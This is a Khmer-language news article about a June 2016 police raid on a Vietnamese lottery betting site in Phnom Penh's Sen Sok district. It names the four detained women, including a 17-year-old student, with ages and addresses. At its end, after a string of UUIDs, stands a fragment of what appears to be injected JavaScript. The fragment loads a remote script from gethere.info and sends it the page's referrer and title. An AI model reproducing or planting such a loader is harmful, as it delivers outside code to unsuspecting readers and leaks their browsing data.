(Video) លោកវរៈសេនីយ៍ឯក ម៉ក់ ហុងដឹកនាំកម្លាំងចុះ បង្ក្រាបទីតាំកត់កន្ទុយលេខដុះស្លែមួយកន្លែង ឃាត់ខ្លួនស្ត្រី៤នាក់

ភ្នំពេញ៖ នេះជាលើកទី៣ដែលកម្លាំងនគរបាលខណ្ឌសែនសុខបានបង្ក្រាបទីតាំងកត់កន្ទុយលេខ (ឆ្នោតវៀតណាម) ដុះស្លែមួយកន្លែងក្នុងនោះឃាត់ខ្លួនស្ត្រី៤នាក់។ ប្រតិបត្តការណ៍នេះធ្វើឡើងកាលពីម៉ោង ពី១៥ និង ០០នាទីរសៀល ថ្ងៃទី ២៦ខែមិថុនា ឆ្នាំ២០១៦ ស្ថិតនៅផ្ទះលក់គ្រឿងទេស យីហោ លី សុគន្ធា ស្ថិតនៅផ្ទះលេខ ២០០ ផ្លូវ៥៩៨ ភូមិទំនប់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ។

ក្នុងប្រតិបត្តិការណ៍នេះដឹកនាំផ្ទាល់ដោយ លោកវរៈសេនីយ៍ឯក ម៉ក់ ហុង អធិការខណ្ឌនគរបាលខណ្ឌសែនសុខ និងដោយមានការសម្របសម្រួលពីលោក អ៊ុំ សុភក្តិ ព្រះរាជអាជ្ញារងអមសាលាដំបូងរាជធានីភ្នំពេញ កម្លាំងអន្តរា គមន៍ និងកម្លាំងប៉ុស្តិ៍ភ្នំពេញថ្មី ។

សមត្ថកិច្ចបានអោយដឹងថា ម្ចាស់ទីតាំងនិងជាអ្នកកត់ឆ្នោតឈ្មោះ លី សុគន្ធា ភេទស្រី អាយុ ៣៩ឆ្នាំ ស្នាក់នៅផ្ទះលេខ ២០០ ផ្លូវ៥៩៨ ភូមិទំនប់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ មានស្រុកកំណើតនៅភូមិកំពង់បាស្រូវ ឃុំជលគិរី ស្រុកបូរីជលសារ ខេត្តកំពង់ឆ្នាំង

ទី២ ឈ្មោះ អឿន ចិន ភេទស្រី អាយុ២៨ មុខរបរ ចុងភៅ ស្នាក់នៅភូមិភូមិទំនប់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ។

ទី៣ ឈ្មោះ ជា សុភា ភេទស្រី អាយុ២៨ឆ្នាំ មុខរបរ មេផ្ទះ ស្នាក់នៅភូមិភូមិទំនប់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ។

ទី៤ ឈ្មោះ ផាត់ ផាណុត ភេទស្រី  អាយុ១៧ឆ្នាំ មុខរបរ សិស្ស ស្នាក់នៅភូមិភូមិទំនប់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ។

 

ប្រភពពីលោក ម៉ក់ ហុង បានប្រាប់ថា ក្រោយពីមានបទបញ្ជាពីនាយឧត្តមសេនីយ៍ ជួន សុវណ្ណ ស្នងការរាជធានីភ្នំពេញ បានដាក់បញ្ជាមកតាមបណ្តាខណ្ឌនានាទូទាំងរាជធានីភ្នំពេញ អោយយកចិត្តទុកដាក់លើ បញ្ហាភូមិ សង្កាត់មានសុវត្ថិភាព ជាពិសេសល្បែងស៊ីសងគ្រប់ប្រភេទ ទើបរសៀលនេះ លោកបានដឹកនាំកម្លាំងក្នុងមូលដ្ឋានចុះបង្ក្រាបទីតាំងកត់កន្ទុយលេខដុះស្លែខាងលើ ឈានដល់ការឃាត់ខ្លួនស្ត្រី៤នាក់ ក្នុងនោះមានមេធំម្នាក់ ដោយដកហូតបានសំភារៈពាក់ព័ន្ធនិងករណីខាងលើមួយចំនួនធំ។

គួររំលឹកដែរថាទីតាំងកត់ឆ្នោតខាងលើ ត្រូវបាននគរបាលខណ្ឌសែនសុខចុះឃាត់ម្តងនេះទៀតជាលើកទី៣ តែម្ចាស់ទីតាំងខាងលើដូចជាមិនរៀងចាលសោះ។

បច្ចុប្បន្នស្រ្តីទាំង៤នាក់ខាងលើ កំពុងសាកសួរនៅអធិការនគរបាលខណ្ឌសែនសុខដើម្បីសួរនាំកសាងសំណុំរឿងចាត់តាមនិតិវិធី។

ddfd478f-8f08-4dda-873d-68e0c64c0a94b1cc3478-75c7-4015-8cf7-ffd8171a378f1a8407b9-c977-479f-a39d-90dc8d5159ec 2aed60bf-69f4-41be-b8cc-5715afd47fb1 08d2b412-ee7b-467f-8079-574d134be3c8 52a56008-ec5f-46ab-bc31-d5f591cfc620 1299a319-d549-44c4-b44a-653048d78d4a 7905aee3-f175-4fe8-920f-e6768d1503e4 331105f6-6ef7-46dc-8c90-ed43f32a9ad8s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More